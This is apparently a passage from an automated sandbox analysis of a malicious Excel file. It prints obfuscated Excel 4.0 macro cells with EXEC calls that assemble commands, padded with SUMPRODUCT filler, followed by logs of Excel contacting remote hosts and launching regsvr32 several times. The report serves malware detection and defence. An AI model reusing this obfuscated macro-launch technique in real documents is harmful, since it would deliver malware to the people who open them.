ODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP108)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP109)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 9, 2021 16:50:36.444119930 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.500637054 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.500673056 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
Apr 9, 2021 16:50:36.500819921 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.500885963 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.501151085 CEST | 49710 | 443 | 192.168.2.5 | 173.201.252.173 |
Apr 9, 2021 16:50:36.673624992 CEST | 443 | 49710 | 173.201.252.173 | 192.168.2.5 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 9, 2021 16:50:31.988054037 CEST | 192.168.2.5 | 8.8.8.8 | 0xd9a4 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:50:32.705511093 CEST | 192.168.2.5 | 8.8.8.8 | 0x4dd1 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:50:33.419395924 CEST | 192.168.2.5 | 8.8.8.8 | 0x17f7 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:50:34.445677996 CEST | 192.168.2.5 | 8.8.8.8 | 0xf943 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 9, 2021 16:50:35.658883095 CEST | 192.168.2.5 | 8.8.8.8 | 0x8f05 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 9, 2021 16:50:32.275301933 CEST | 8.8.8.8 | 192.168.2.5 | 0xd9a4 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:50:33.006109953 CEST | 8.8.8.8 | 192.168.2.5 | 0x4dd1 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:50:33.436000109 CEST | 8.8.8.8 | 192.168.2.5 | 0x17f7 | No error (0) | 162.251.80.27 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:50:34.587918997 CEST | 8.8.8.8 | 192.168.2.5 | 0xf943 | No error (0) | 67.222.38.97 | A (IP address) | IN (0x0001) | ||
Apr 9, 2021 16:50:35.671541929 CEST | 8.8.8.8 | 192.168.2.5 | 0x8f05 | No error (0) | 173.201.252.173 | A (IP address) | IN (0x0001) |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49702 | 8.211.4.209 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 9, 2021 16:50:32.297149897 CEST | 1201 | OUT | |
Apr 9, 2021 16:50:32.695029020 CEST | 1232 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.5 | 49704 | 8.211.4.209 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 9, 2021 16:50:33.029623985 CEST | 1240 | OUT | |
Apr 9, 2021 16:50:33.410718918 CEST | 1246 | IN |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Apr 9, 2021 16:50:33.741060972 CEST | 162.251.80.27 | 443 | 192.168.2.5 | 49706 | CN=autodiscover.shalombaptistchapel.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Sat Feb 13 12:43:03 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Fri May 14 13:43:03 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
Apr 9, 2021 16:50:34.915242910 CEST | 67.222.38.97 | 443 | 192.168.2.5 | 49708 | CN=www.cesiroinsurance.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Mon Feb 15 21:11:45 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Sun May 16 22:11:45 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
Apr 9, 2021 16:50:36.020798922 CEST | 173.201.252.173 | 443 | 192.168.2.5 | 49710 | CN=innermetransformation.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 02 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004 | Tue Jun 01 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
Code Manipulations |
---|
System Behavior |
---|
General |
---|
Start time: | 16:50:26 |
Start date: | 09/04/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf50000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:35 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:35 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:36 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:36 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:37 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7ff797770000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|